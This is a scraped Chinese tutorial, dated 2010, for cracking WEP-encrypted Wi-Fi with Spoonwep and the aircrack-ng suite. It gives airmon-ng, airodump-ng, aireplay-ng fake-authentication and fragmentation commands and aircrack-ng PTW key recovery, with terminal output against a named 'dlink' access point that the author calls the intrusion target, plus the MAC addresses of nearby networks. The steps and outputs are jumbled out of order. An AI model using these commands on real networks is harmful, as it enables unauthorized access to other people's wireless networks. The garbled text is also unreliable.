Spoonwep 破解 wep 加密

合集下载
相关主题
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!
Aircrack-ng 1.0
[00:00:04] Tested 1562761 keys (got 1412 IVs)
KB depth byte(vote) 0 62/ 63 F3(1756) 69(1720) 90(1720) A8(1720) AF(1720) 1 27/ 1 FA(2124) 6C(2088) 9E(2088) D8(2084) C7(2012) 2 22/ 2 98(2196) 1A(2160) 3A(2160) 70(2160) 99(2160) 3 17/ 40 38(2304) 15(2232) 9D(2232) A6(2232) B7(2196) 4 14/ 40 F2(2232) D8(2196) E9(2160) FF(2160) 17(2124)
[root@Archlinux ~]# aircrack-ng -n 64 -b 002401C00BF8 333-01.ivs Opening 333-01.ivs Attack will be restarted every 5000 captured ivs. Starting PTW attack with 1412 ivs.
lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
00:15:70:D2:0F:84 -1 0 0 34 12 158 -1 OPN
<length: 0>
00:24:01:C0:0B:F8 -78 43 1108 1412 35 6 54e WEP WEP dlink
00:26:5A:AC:BC:D6 -83 20 871 0 0 6 54e WPA2 CCMP PSK 405
这时候,刚才未关闭的那个窗口 ,即 airodump-ng 窗口 变化显著(可能) 如很明显,则当 data 数值增长到 10000 多的时候可以直接运行下面的命令破解: _______________________________________________________________________________
PID Name 2013 NetworkManager 2017 wpa_supplicant
Interface Chipset
Driver
wlan0
Intel 3945ABG
iwl3945 - [phy0]
(monitor mode enabled on mon0)
3、终端输入:kill 2013 2017 #杀死上面提到的可能造成麻烦的进程<#经测试,可以不杀死进 程!可 以 跳 过 @>
00:0E:E8:DB:33:EB -87 0 138 0 0 11 54 WPA TKIP PSK ipTIME
00:1B:2F:08:51:E6 -87 0 2 1 0 11 54 . WPA TKIP PSK NETGEAR
00:23:68:09:C9:CC -85 0 31 7 0 6 54 OPN
Failed. Next try with 5000 Ivs. (因为我中间关闭了一次 airodump-ng 那个窗口,生出了 33302.ivs) # 我的没有很快的增长(只有 1412),所以这里失败了,下面继续(还是可以破解的:—)心 急吃不了热豆腐@! ___________________________________________________________________________________ ______________________________ 9、aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:71:BD:69:CC mon0
#此处 ivs 之前两小杆,看清楚; “333” 这个可以任意命名(后面要用到); -c 6 是确定信道为 6 mon0 是上面开启的,查到的//
注意:这之后您看到和刚才在 spoonwep 开启的窗口类似的结果。(请不要关闭此窗口)
BSSID
PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
(这 一 步 请 您 在 第 七 之 后 执 行 @!)
————————————————
···第 2 中有如下提示 —— (monitor mode enabled on mon0)、6 是信道值···
得到如下结果:
[root@Archlinux ~]# airmon-ng start mon0 6
00:15:70:D2:0F:78 -84 0 92 13 0 6 54 OPN
CMCC
00:1D:0F:7E:01:E4 -84 24 860 0 0 6 54 . WEP WEP FR10313
00:25:86:24:1F:86 -86 0 6 0 0 6 54 . WEP WEP F10-210
得到如下结果:
[root@Archlinux ~]# aireplay-ng -1 0 -e dlink -a 00:24:01:C0:0B:F8 -h 00:1B:71:BD:69:CC mon0 14:48:53 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
Process with PID 4162 (airodump-ng) is running on interface mon0
Process with PID 4170 (airodump-ng) is running on interface mon0
Interface Chipset
Driver
是之前还未破解时,数值增长很慢,待会儿这个地方也会有变化 #CH 下面的 6,代表信道 #ENC 代表加密方式,此处为 wep 加密 #AUTH ——>请注意,这个待会儿有所变化(具体我也解释不清,我只是使用者) #ESSID 是这个无线的名称(主人定义的)
————————————————
6、终端 airmon-ng start mon0 6
wlan0 mon0
mon1
Intel 3945ABG
iwl3945 - [phy0]
Intel 3945ABG
iwl3945 - [phy0]
(monitor mode enabled on mon2)
Intel 3945ABG
iwl3945 - [phy0]
7、下面开始抓包:(还是在终端执行) 终端输入 airodump-ng --ivs -w 333 -c 6 mon0
8、终端输入:aireplay-ng -1 0 -e dlink -a 00:24:01:C0:0B:F8 -h 00:1B:71:BD:69:CC mon0
#此处 -e 后面的是 AP‘S ESSID -a 之后是 AP'S BSSID 就是 ap 的 mac 地址 -h 之后是自己的 mac 地址(据说可以用 station 的地址)
<只 是 给 出 例 子 , 数 值 不 一 定 是 这 样 的 , 有 些 一 直 在 变 动 >
# AP'S MAC 此处我查到的是 00:24:01:CO:08:F8 (被破解,入侵目标的 MAC 地址) #197+以及 133+代表这个数字是一直在增加的##破解之后,我舍友使用这地址时,Data 数值增 长很快,但
14:48:53 Sending Authentication Request (Open System) [ACK] 14:48:53 Authentication successful 14:48:53 Sending Association Request [ACK] 14:48:53 Association successful :-) (AID: 1)
Spoonwep 破解 wep 加密
(用 aircrack-ng) 2010.01.15 tyro
1、打开 终端: 输入:ifconfig (非必须可以跳过 )
_______________________________ 得到以下结果: [root@Archlinux ~]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:1A:A0:FF:21:BF UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) Interrupt:17
RX bytes:303752 (296.6 Kb) TX bytes:179166 (174.9 Kb)
________________________________ 2、终端输入: airmon-ng start wlan0 ________________________________
得到如下结果: [root@Archlinux ~]# airmon-ng start wlan0
解的目标)
BSSID PWR Beacons #Data ,#/s CH MB ENC CIPHER AUTH ESSID
AP'S MAC -83 197+ 133+ 0 6 54e wep wep
dlink
BSSID STAຫໍສະໝຸດ BaiduION AP’S MAC mac
PWR Rate Lost Packets Probes -43 11e-1e 22+- 2000+ dlink
CMCC
00:22:B0:91:64:19 -85 0 6 0 0 6 54 . WPA2 CCMP PSK Karas
00:27:19:9E:30:F6 -1 0 0 0 0 -1 -1
<length: 0>
BSSID
STATION
PWR Rate Lost Packets Probes
00:15:70:D2:0F:84 00:1B:77:94:AD:04 -87 6 - 1 19 188 CMCC (not associated) 00:22:FB:A4:DF:F4 -72 0 - 1 0 55
wlan0 Link encap:Ethernet HWaddr 00:1B:71:BD:69:CC UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:1078 errors:0 dropped:0 overruns:0 frame:0 TX packets:752 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000
4、modprobe iwl3945 #上面得到的关于无线的结果<#经测试,可以跳过>
5、打开 spoonwep,查到您想破解的无线的 信道 ——> spoonwep 开启后 会自动跳出一个扫描 窗口,里面有标 ch 下面的那个数字就是信道 ,通常是 1 、6、11 ,我扫到的有以下:(只给 一个例子,其实扫出来的很多)(这一步不 是 必 须 的 ,因为后面的命令行中您会看到您需要破
相关文档
最新文档